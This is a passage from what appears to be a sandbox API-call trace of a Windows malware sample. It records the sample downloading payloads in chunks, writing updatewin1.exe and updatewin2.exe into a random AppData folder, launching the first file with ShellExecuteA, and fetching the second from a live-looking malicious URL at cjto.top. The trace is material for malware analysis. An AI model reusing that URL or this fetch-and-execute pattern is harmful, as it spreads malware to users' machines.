lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0161.102] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0161.267] WriteFile (in: hFile=0x5b8, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0161.267] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0161.272] WriteFile (in: hFile=0x5b8, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0161.273] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0161.273] WriteFile (in: hFile=0x5b8, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0161.273] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0161.274] WriteFile (in: hFile=0x5b8, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0161.274] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0161.274] WriteFile (in: hFile=0x5b8, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0161.275] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0161.275] WriteFile (in: hFile=0x5b8, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0161.275] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0161.436] WriteFile (in: hFile=0x5b8, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0161.436] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0161.437] WriteFile (in: hFile=0x5b8, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0161.438] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0161.438] WriteFile (in: hFile=0x5b8, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0161.438] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0161.439] WriteFile (in: hFile=0x5b8, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0161.441] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0161.441] WriteFile (in: hFile=0x5b8, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0161.442] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0xa00) returned 1 [0161.442] WriteFile (in: hFile=0x5b8, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0xa00, lpOverlapped=0x0) returned 1 [0161.442] CloseHandle (hObject=0x5b8) returned 1 [0161.446] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0161.451] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0161.633] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin1.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0163.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x39dad8 | out: hHeap=0x2c0000) returned 1 [0163.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3578db8 | out: hHeap=0x2c0000) returned 1 [0163.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a0b820 | out: hHeap=0x2c0000) returned 1 [0163.575] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0163.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9dc88 [0163.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3a0b7f0 [0163.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a9dc88, cbMultiByte=-1, lpWideCharStr=0x3a0b7f0, cchWideChar=1072 | out: lpWideCharStr="http://cjto.top/files/penelop/updatewin2.exe") returned 45 [0163.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x3aa2818 [0163.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a0b7f0 | out: hHeap=0x2c0000) returned 1 [0163.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9dc88 | out: hHeap=0x2c0000) returned 1 [0163.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x3a0b7f0 [0163.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0163.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://cjto.top/files/penelop/updatewin2.exe", cchWideChar=-1, lpMultiByteStr=0x3a8ca68, cbMultiByte=2096, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://cjto.top/files/penelop/updatewin2.exe", lpUsedDefaultChar=0x0) returned 45 [0163.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0163.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0163.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a0b7f0 | out: hHeap=0x2c0000) returned 1 [0163.575] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://cjto.top/files/penelop/updatewin2.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0164.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0164.400] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x9ffd6d0, lpdwBufferLength=0x9ffd710, lpdwIndex=0x0 | out: lpBuffer=0x9ffd6d0*, lpdwBufferLength=0x9ffd710*=0x4, lpdwIndex=0x0) returned 1 [0164.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9ddf0 [0164.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a58660 [0164.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9ddf0 | out: hHeap=0x2c0000) returned 1 [0164.400] lstrcpyA (in: lpString1=0x3a0a798, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033" [0164.400] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033", pMore="updatewin2.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin2.exe") returned 1 [0164.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3a9fc38 [0164.400] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin2.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin2.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690 [0164.400] SetFilePointer (in: hFile=0x690, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0164.400] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0164.904] WriteFile (in: hFile=0x690, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0164.905] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0165.111] WriteFile (in: hFile=0x690, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0165.112] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0165.112] WriteFile (in: hFile=0x690, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0165.113] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0165.113] WriteFile (in: hFile=0x690, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0165.113] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0165.350] WriteFile (in: hFile=0x690, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0165.350] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0165.351] WriteFile (in: hFile=0x690, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0165.351] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0165.352] WriteFile (in: hFile=0x690, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0165.352] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0165.353] WriteFile (in: hFile=0x690, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0165.353] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0165.607] WriteFile (in: hFile=0x690, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0165.608] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0165.608] WriteFile (in: hFile=0x690, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0165.608] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0165.609] WriteFile (in: hFile=0x690, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0165.609] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0165.609] WriteFile (in: hFile=0x690, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0165.610] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0165.610] WriteFile (in: hFile=0x690, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0165.610] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0165.611] WriteFile (in: hFile=0x690, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0165.611] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0165.611] WriteFile (in: hFile=0x690, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0165.612] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0165.774] WriteFile (in: hFile=0x690, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0165.774] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0165.778] WriteFile (in: hFile=0x690, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0165.778] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0165.844] WriteFile (in: hFile=0x690, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0165.844] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0165.845] WriteFile (in: hFile=0x690, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0165.846] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0165.846] WriteFile (in: hFile=0x690, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0165.846] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0165.847] WriteFile (in: hFile=0x690, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0165.847] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0165.941] WriteFile (in: hFile=0x690, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0165.941] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0165.950] WriteFile (in: hFile=0x690, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0165.950] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0166.012] WriteFile (in: hFile=0x690, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0166.012] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0166.013] WriteFile (in: hFile=0x690, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0166.013] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0166.014] WriteFile (in: hFile=0x690, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0166.015] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0166.016] WriteFile (in: hFile=0x690, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0166.016] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x1200) returned 1 [0166.017] WriteFile (in: hFile=0x690, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x1200, lpOverlapped=0x0) returned 1 [0166.017] CloseHandle 